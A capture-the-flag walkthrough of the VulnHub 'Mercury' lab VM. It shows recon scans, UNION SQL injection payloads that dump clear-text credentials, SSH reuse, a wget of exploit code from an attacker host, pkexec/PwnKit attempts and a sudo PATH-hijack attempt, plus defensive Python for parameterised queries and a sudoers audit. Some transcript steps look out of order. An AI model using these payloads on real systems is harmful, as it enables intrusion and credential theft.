The Planets: Mercury
Author: jason_huawen
Basic information of the target machine
Title: The Planets: Mercury
Address:
https://www.vulnhub.com/entry/the-planets-mercury,544/
Identify the target host IP address
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.76.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP              At MAC Address     Count  Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1    0a:00:27:00:00:0a  1      60   Unknown vendor
192.168.56.100  08:00:27:9e:f5:5c  1      60   PCS Systemtechnik GmbH
192.168.56.226  08:00:27:ff:54:84  1      60   PCS Systemtechnik GmbH
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.226.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.226 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 23:03 EST
Nmap scan report for localhost (192.168.56.226)
Host is up (0.00010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c8:24:ea:2a:2b:f1:3c:fa:16:94:65:bd:c7:9b:6c:29 (RSA)
|   256 e8:08:a1:8e:7d:5a:bc:5c:66:16:48:24:57:0d:fa:b8 (ECDSA)
|_  256 2f:18:7e:10:54:f7:b9:17:a2:11:1d:8f:b3:30:a5:2a (ED25519)
8080/tcp open  http-proxy WSGIServer/0.2 CPython/3.8.2
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     Date: Sun, 27 Nov 2022 04:03:14 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html
|     X-Frame-Options: DENY
|     Content-Length: 2366
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta http-equiv="content-type" content="text/html; charset=utf-8">
|     <title>Page not found at /nice ports,/Trinity.txt.bak</title>
|     <meta name="robots" content="NONE,NOARCHIVE">
|     <style type="text/css">
|     html * { padding:0; margin:0; }
|     body * { padding:10px 20px; }
|     body * * { padding:0; }
|     body { font:small sans-serif; background:#eee; color:#000; }
|     body>div { border-bottom:1px solid #ddd; }
|     font-weight:normal; margin-bottom:.4em; }
|     span { font-size:60%; color:#666; font-weight:normal; }
|     table { border:none; border-collapse: collapse; width:100%; }
|     vertical-align:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Sun, 27 Nov 2022 04:03:14 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html; charset=utf-8
|     X-Frame-Options: DENY
|     Content-Length: 69
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     Hello. This site is currently in development please check back later.
|   RTSPRequest:
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:FF:54:84 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.61 seconds
The NMAP scan shows that the target host has two open ports: 22 (SSH, OpenSSH 8.2p1) and 8080 (HTTP, a Python WSGIServer). The robots.txt on 8080 disallows everything, and the 404 response already looks like a Django debug page.
Gaining access
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/
Hello. This site is currently in development please check back later.
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/robots.txt
User-agent: *
Disallow: /
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ nikto -h http://192.168.56.226:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.226
+ Target Hostname:    192.168.56.226
+ Target Port:        8080
+ Start Time:         2022-11-26 23:17:00 (GMT-5)
---------------------------------------------------------------------------
+ Server: WSGIServer/0.2 CPython/3.8.2
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-17113: /SilverStream: SilverStream allows directory listing
+ Server banner has changed from 'WSGIServer/0.2 CPython/3.8.2' to 'WSGIServer/0.2 Python/3.8.2' which may suggest a WAF, load balancer or proxy is in place
+ 7928 requests: 0 error(s) and 2 item(s) reported on remote host
+ End Time:           2022-11-26 23:17:52 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (WSGIServer/0.2) are not in the Nikto 2.1.6 database or are newer than the known string. Would you like to submit this information (*no server specific data*) to CIRT.net for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
Nikto reports a /SilverStream directory, so request it directly:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/SilverStream/
<!DOCTYPE html>
<html lang="en">
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <title>Page not found at /SilverStream/</title>
  <meta name="robots" content="NONE,NOARCHIVE">
  <style type="text/css">
    html * { padding:0; margin:0; }
    body * { padding:10px 20px; }
    body * * { padding:0; }
    body { font:small sans-serif; background:#eee; color:#000; }
    body>div { border-bottom:1px solid #ddd; }
    h1 { font-weight:normal; margin-bottom:.4em; }
    h1 span { font-size:60%; color:#666; font-weight:normal; }
    table { border:none; border-collapse: collapse; width:100%; }
    td, th { vertical-align:top; padding:2px 3px; }
    th { width:12em; text-align:right; color:#666; padding-right:.5em; }
    #info { background:#f6f6f6; }
    #info ol { margin: 0.5em 4em; }
    #info ol li { font-family: monospace; }
    #summary { background: #ffc; }
    #explanation { background:#eee; border-bottom: 0px none; }
  </style>
</head>
<body>
  <div id="summary">
    <h1>Page not found <span>(404)</span></h1>
    <table class="meta">
      <tr>
        <th>Request Method:</th>
        <td>GET</td>
      </tr>
      <tr>
        <th>Request URL:</th>
        <td>http://192.168.56.226:8080/SilverStream/</td>
      </tr>
    </table>
  </div>
  <div id="info">
    <p>
      Using the URLconf defined in <code>mercury_proj.urls</code>,
      Django tried these URL patterns, in this order:
    </p>
    <ol>
      <li> [name='index'] </li>
      <li> robots.txt [name='robots'] </li>
      <li> mercuryfacts/ </li>
    </ol>
    <p>
      The current path, <code>SilverStream/</code>, didn't match any of these.
    </p>
  </div>
  <div id="explanation">
    <p>
      You're seeing this error because you have <code>DEBUG = True</code> in
      your Django settings file. Change that to <code>False</code>, and Django
      will display a standard 404 page.
    </p>
  </div>
</body>
</html>
Although the response is a 404, the application runs with DEBUG = True, so Django lists every URL pattern it tried. That leaks a path we did not know about: mercuryfacts/.
Request this path:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/mercuryfacts/
<html>
<head>
  <title> Mercury Facts </title>
</head>
<body>
  <img src="/static/mercury_facts/mercury_1.jpg" alt="Picture of Mercury" width="400" height="400">
  <br />
  Still in development.
  <ul>
    <li> Mercury Facts: <a href='/mercuryfacts/1'> Load a fact. </a> </li>
    <li> Website Todo List: <a href='/mercuryfacts/todo'> See list. </a> </li>
  </ul>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/mercuryfacts/todo
<html>
<head>
  <title> Mercury Facts Todo </title>
</head>
<body>
  Still todo:
  <ul>
    <li> Add CSS. </li>
    <li> Implement authentication (using users table)</li>
    <li> Use models in django instead of direct mysql call</li>
    <li> All the other stuff, so much!!! </li>
  </ul>
</body>
</html>
The author's todo list gives two useful hints: the application talks to MySQL directly rather than through Django models, and there is a users table. A direct query built from user input is a classic SQL injection candidate.
/mercuryfacts/1 returns a different fact for each number in the path. Does that id reach the query unescaped? Test it:
http://192.168.56.226:8080/mercuryfacts/1 order by 1/
Fact id: 1 order by 1. (('Mercury does not have any moons or rings.',),)
The query returns only one column.
http://192.168.56.226:8080/mercuryfacts/1 and 1%3D2 union select database()/
Fact id: 1 and 1=2 union select database(). (('mercury',),)
The database name is mercury.
Fact id: 1 and 1=2 union select table_name from information_schema.tables where table_schema=database() limit 0,1. (('facts',),)
The name of the first table is facts
Fact id: 1 and 1=2 union select table_name from information_schema.tables where table_schema=database() limit 1,1. (('users',),)
The name of the second table is users
Next, enumerate the column names of the users table:
Fact id: 1 and 1=2 union select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1. (('id',),)
The first column is id.
Fact id: 1 and 1=2 union select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1. (('password',),)
The second column is password.
Fact id: 1 and 1=2 union select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1. (('username',),)
The third column is username.
Next, dump the rows of the users table:
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from users limit 0,1. (('john~johnny1987',),)
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from users limit 1,1. (('laura~lovemykids111',),)
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from users limit 2,1. (('sam~lovemybeer111',),)
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from users limit 3,1. (('webmaster~mercuryisthesizeof0.056Earths',),)
At this point, manual SQL injection has yielded every username and password in the users table (stored in clear text):
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ cat username_and_password
webmaster mercuryisthesizeof0.056Earths
sam lovemybeer111
laura lovemykids111
john johnny1987
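The root cause above is a view that pastes the URL segment straight into a MySQL query. The following is an added illustration, not code from the Mercury machine: it uses an in-memory SQLite stand-in (constructed schema and rows) to show the weak pattern next to the hardened one, where the id is validated at the boundary and bound as a query parameter.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the target's MySQL database. Table and
# column names match what the injection enumerated; the row values are made up.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE facts (id INTEGER PRIMARY KEY, fact TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO facts VALUES (1, 'Mercury does not have any moons or rings.');
        INSERT INTO users VALUES (1, 'webmaster', 'example-only-password');
    """)
    return conn

def get_fact_vulnerable(conn, fact_id):
    """Weak pattern: the path segment becomes part of the SQL text, so anything
    after the number ("order by 1", "and 1=2 union select ...") is executed as
    SQL. fetchall() returns the raw rows, much like the page's (('...',),)."""
    cur = conn.execute("SELECT fact FROM facts WHERE id = " + fact_id)
    return cur.fetchall()

# Same regex as Django's <int:...> path converter: only ASCII decimal digits.
FACT_ID_RE = re.compile(r"[0-9]+")

def get_fact_safe(conn, fact_id):
    """Hardened version: reject anything that is not a plain decimal id, then
    bind the value as a parameter so it can never be parsed as SQL.
    sqlite3 uses '?' placeholders; Django's MySQL cursor uses '%s' with the
    same params tuple, e.g. cursor.execute("... WHERE id = %s", [fact_id])."""
    if not FACT_ID_RE.fullmatch(fact_id):
        raise ValueError("fact id must be a decimal integer")
    cur = conn.execute("SELECT fact FROM facts WHERE id = ?", (int(fact_id),))
    return cur.fetchall()

def safe_rejects(conn, fact_id):
    """True when the hardened lookup refuses the input instead of querying."""
    try:
        get_fact_safe(conn, fact_id)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    probe = "1 and 1=2 union select username from users"
    print("vulnerable:", get_fact_vulnerable(db, probe))   # leaks a username
    print("hardened rejects probe:", safe_rejects(db, probe))
    print("hardened, normal id:", get_fact_safe(db, "1"))
```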
No login page on port 8080 has turned up for these credentials so far. Could they be SSH accounts? Trying each username with its password shows that only the webmaster user can log in:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ls
nmap_full_scan  username_and_password
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ cat username_and_password
webmaster mercuryisthesizeof0.056Earths
sam lovemybeer111
laura lovemykids111
john johnny1987
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh john@192.168.56.226
The authenticity of host '192.168.56.226 (192.168.56.226)' can't be established.
ED25519 key fingerprint is SHA256:mHhkDLhyH54cYFlptygnwr7NYpEtepsNhVAT8qzqcUk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.226' (ED25519) to the list of known hosts.
john@192.168.56.226's password:
Permission denied, please try again.
john@192.168.56.226's password:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh laura@192.168.56.226
laura@192.168.56.226's password:
Permission denied, please try again.
laura@192.168.56.226's password:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh sam@192.168.56.226
sam@192.168.56.226's password:
Permission denied, please try again.
sam@192.168.56.226's password:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh webmaster@192.168.56.226
webmaster@192.168.56.226's password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

System information disabled due to load higher than 1.0

22 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Sep  1 13:57:14 2020 from 192.168.31.136
webmaster@mercury:~$
webmaster@mercury:~$ cat user_flag.txt
[user_flag_8339915c9a454657bd60ee58776f4ccd]
webmaster@mercury:~$ cd mercury_proj/
webmaster@mercury:~/mercury_proj$ ls -alh
total 28K
drwxrwxr-x 5 webmaster webmaster 4.0K Aug 28  2020 .
drwx------ 4 webmaster webmaster 4.0K Sep  2  2020 ..
-rw-r--r-- 1 webmaster webmaster    0 Aug 27  2020 db.sqlite3
-rwxr-xr-x 1 webmaster webmaster  668 Aug 27  2020 manage.py
drwxrwxr-x 6 webmaster webmaster 4.0K Sep  1  2020 mercury_facts
drwxrwxr-x 4 webmaster webmaster 4.0K Aug 28  2020 mercury_index
drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28  2020 mercury_proj
-rw------- 1 webmaster webmaster  196 Aug 28  2020 notes.txt
webmaster@mercury:~/mercury_proj$ cat notes.txt
Project accounts (both restricted):
webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==
webmaster@mercury:~/mercury_proj$ cd mercury_facts/
webmaster@mercury:~/mercury_proj/mercury_facts$ ls -alh
total 48K
drwxrwxr-x 6 webmaster webmaster 4.0K Sep  1  2020 .
drwxrwxr-x 5 webmaster webmaster 4.0K Aug 28  2020 ..
-rw-r--r-- 1 webmaster webmaster   63 Aug 27  2020 admin.py
-rw-r--r-- 1 webmaster webmaster  100 Aug 27  2020 apps.py
-rw-r--r-- 1 webmaster webmaster    0 Aug 27  2020 __init__.py
drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28  2020 migrations
-rw-r--r-- 1 webmaster webmaster   57 Aug 27  2020 models.py
drwxrwxr-x 2 webmaster webmaster 4.0K Aug 28  2020 __pycache__
drwxrwxr-x 3 webmaster webmaster 4.0K Sep  1  2020 static
drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28  2020 templates
-rw-r--r-- 1 webmaster webmaster   60 Aug 27  2020 tests.py
-rw-rw-r-- 1 webmaster webmaster  369 Aug 28  2020 urls.py
-rw-r--r-- 1 webmaster webmaster  637 Aug 28  2020 views.py
webmaster@mercury:~/mercury_proj/mercury_facts$ cd ..
webmaster@mercury:~/mercury_proj$ ls -alh
total 28K
drwxrwxr-x 5 webmaster webmaster 4.0K Aug 28  2020 .
drwx------ 4 webmaster webmaster 4.0K Sep  2  2020 ..
-rw-r--r-- 1 webmaster webmaster    0 Aug 27  2020 db.sqlite3
-rwxr-xr-x 1 webmaster webmaster  668 Aug 27  2020 manage.py
drwxrwxr-x 6 webmaster webmaster 4.0K Sep  1  2020 mercury_facts
drwxrwxr-x 4 webmaster webmaster 4.0K Aug 28  2020 mercury_index
drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28  2020 mercury_proj
-rw------- 1 webmaster webmaster  196 Aug 28  2020 notes.txt
webmaster@mercury:~/mercury_proj$
notes.txt stores the project account passwords base64-encoded. Decode the linuxmaster one and switch to that user:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ echo "bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==" | base64 -d
mercurymeandiameteris4880km
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$
linuxmaster@mercury:/home$ sudo -l
Matching Defaults entries for linuxmaster on mercury:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User linuxmaster may run the following commands on mercury:
    (root : root) SETENV: /usr/bin/check_syslog.sh
Privilege escalation
linuxmaster@mercury:/home$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/chfn
/usr/bin/at
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
Try the setuid pkexec binary (PolicyKit) for privilege escalation, using this public exploit:
https://www.exploit-db.com/exploits/17932
linuxmaster@mercury:/tmp$ wget http://192.168.56.206:8000/17932.c
--2022-11-27 05:23:26--  http://192.168.56.206:8000/17932.c
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3492 (3.4K) [text/x-csrc]
Saving to: '17932.c'

17932.c             100%[====================================================>]   3.41K  --.-KB/s    in 0s

2022-11-27 05:23:26 (715 MB/s) - '17932.c' saved [3492/3492]

linuxmaster@mercury:/tmp$ ls
17932.c
linpeas.sh
systemd-private-03a2003400454137ae070720e9620284-systemd-logind.service-BZzHpg
systemd-private-03a2003400454137ae070720e9620284-systemd-resolved.service-EzwFLg
systemd-private-03a2003400454137ae070720e9620284-systemd-timesyncd.service-CmPcsi
tmux-1002
linuxmaster@mercury:/tmp$ gcc 17932.c -o exploit
linuxmaster@mercury:/tmp$ ls
17932.c     systemd-private-03a2003400454137ae070720e9620284-systemd-logind.service-BZzHpg    tmux-1002
exploit     systemd-private-03a2003400454137ae070720e9620284-systemd-resolved.service-EzwFLg
linpeas.sh  systemd-private-03a2003400454137ae070720e9620284-systemd-timesyncd.service-CmPcsi
linuxmaster@mercury:/tmp$ chmod +x exploit
linuxmaster@mercury:/tmp$ ./exploit
=============================
=      PolicyKit Pwnage     =
=          by zx2c4         =
=       Sept 2, 2011        =
=============================

[+] Configuring inotify for proper pid.
[+] Launching pkexec.
linuxmaster@mercury:/tmp$
Privilege escalation fails; this exploit does not work against the target.
Switch to different exploit code (CVE-2021-4034):
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ls
17932.c         CVE-2021-4034-main      cve.tar.gz  nmap_full_scan
cve-2021-4034.c CVE-2021-4034-main.zip  linpeas.sh  username_and_password
Since the target host has no zip command, the exploit directory is packaged with tar and uploaded to the target host instead.
linuxmaster@mercury:/tmp$ ls
17932.c                 cve.tar.gz  systemd-private-03a2003400454137ae070720e9620284-systemd-logind.service-BZzHpg
cve-2021-4034.c         exploit     systemd-private-03a2003400454137ae070720e9620284-systemd-resolved.service-EzwFLg
CVE-2021-4034-main      exploit2    systemd-private-03a2003400454137ae070720e9620284-systemd-timesyncd.service-CmPcsi
CVE-2021-4034-main.zip  linpeas.sh  tmux-1002
linuxmaster@mercury:/tmp$ cd CVE-2021-4034-main/
linuxmaster@mercury:/tmp/CVE-2021-4034-main$ ls
cve-2021-4034.sh  dry-run  LICENSE  Makefile  pwnkit.c  README.md
linuxmaster@mercury:/tmp/CVE-2021-4034-main$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cat cve-2021-4034.sh >cve-2021-4034
chmod a+x cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
linuxmaster@mercury:/tmp/CVE-2021-4034-main$ ls
cve-2021-4034     dry-run        'GCONV_PATH=.'  Makefile   pwnkit.so
cve-2021-4034.sh  gconv-modules  LICENSE         pwnkit.c   README.md
linuxmaster@mercury:/tmp/CVE-2021-4034-main$ ./cve-2021-4034
make: *** No targets.  Stop.
Running the program also fails, so this route is a dead end. The command allowed by sudo -l is the next direction to try for escalation:
linuxmaster@mercury:~$ cat /usr/bin/check_syslog.sh
#!/bin/bash
tail -n 10 /var/log/syslog
Note that tail is invoked without an absolute path, so it is resolved through PATH; that is the thing to start with. Unfortunately check_syslog.sh is only readable, not writable, so the script itself cannot be edited and another approach is needed: put a fake tail first in PATH and pass that PATH through sudo, which the SETENV tag permits.
vice-CmPcsi
lrwxrwxrwx  1 linuxmaster linuxmaster   12 Nov 27 05:47 tail -> /usr/bin/vim
drwxrwxrwt  2 root        root        4.0K Nov 27 04:00 .Test-unix
drwx------  2 linuxmaster linuxmaster 4.0K Nov 27 05:16 tmux-1002
drwxrwxrwt  2 root        root        4.0K Nov 27 04:00 .X11-unix
drwxrwxrwt  2 root        root        4.0K Nov 27 04:00 .XIM-unix
linuxmaster@mercury:/tmp$ ln -s /usr/bin/vim tail
linuxmaster@mercury:/tmp$ export PATH=$(pwd):$PATH
linuxmaster@mercury:/tmp$ sudo --preserve-env=PATH /usr/bin/check_syslog.sh
Nov 27 05:30:11 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection.
Nov 27 05:34:27 mercury kernel: [ 5651.595118] cgroup: fork rejected by pids controller in /user.slice/user-1001.slice/session-2.scope
Nov 27 05:35:09 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server.
Nov 27 05:35:09 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection.
Nov 27 05:40:09 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server.
Nov 27 05:40:09 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection.
Nov 27 05:45:09 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server.
Nov 27 05:45:09 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection.
Nov 27 05:50:08 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server.
Nov 27 05:50:08 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection.
linuxmaster@mercury:/tmp$
But this attempt, too, fails to elevate privileges: the real tail runs and the last ten lines of syslog are printed.
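The weakness this section probes is a sudo-allowed script that resolves a command through PATH while the sudoers rule carries SETENV. The following is an added audit helper, not part of the original walkthrough: it takes the rule text from sudo -l and the script body (both copied from above as constructed strings) and flags the two conditions, alongside a fixed version of the script that calls tail by absolute path.

```python
import re

# Constructed copies of the two artifacts shown above.
SUDO_RULE = "(root : root) SETENV: /usr/bin/check_syslog.sh"
CHECK_SYSLOG_SH = "#!/bin/bash\ntail -n 10 /var/log/syslog\n"

# Hardened version of the script: every external command fully qualified.
FIXED_CHECK_SYSLOG_SH = "#!/bin/bash\n/usr/bin/tail -n 10 /var/log/syslog\n"

# Builtins never go through PATH lookup, so they are not findings.
SHELL_BUILTINS = {"cd", "echo", "exit", "export", "set", "test", "[",
                  "true", "false", "read", "printf", "shift", "return"}

# VAR=value words that may precede a command name.
ASSIGNMENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")

def unqualified_commands(script_text):
    """Return the command names a shell script invokes without an absolute path.

    Each non-comment line is split at pipes, ';', '&&' and '||' so every simple
    command is inspected; leading VAR=value assignments are skipped.
    """
    found = []
    for line in script_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for segment in re.split(r"\|\|?|&&|;", line):
            words = segment.split()
            while words and ASSIGNMENT_RE.match(words[0]):
                words.pop(0)
            if not words:
                continue
            cmd = words[0]
            if not cmd.startswith("/") and cmd not in SHELL_BUILTINS:
                found.append(cmd)
    return found

def sudo_rule_allows_env(rule):
    """True when the rule carries the SETENV tag, which lets the invoking user
    pass environment variables (PATH included) to the command run via sudo."""
    return re.search(r"\bSETENV:", rule) is not None

def audit(rule, script_text):
    """Findings for one sudoers rule and the script it permits."""
    findings = []
    cmds = unqualified_commands(script_text)
    for cmd in cmds:
        findings.append(f"'{cmd}' is resolved via PATH; call it by absolute path")
    if cmds and sudo_rule_allows_env(rule):
        findings.append("SETENV lets the caller shape the environment of a "
                        "script that depends on PATH lookup; drop the tag")
    return findings

if __name__ == "__main__":
    for name, script in (("current", CHECK_SYSLOG_SH), ("fixed", FIXED_CHECK_SYSLOG_SH)):
        print(name, audit(SUDO_RULE, script) or ["no findings"])
```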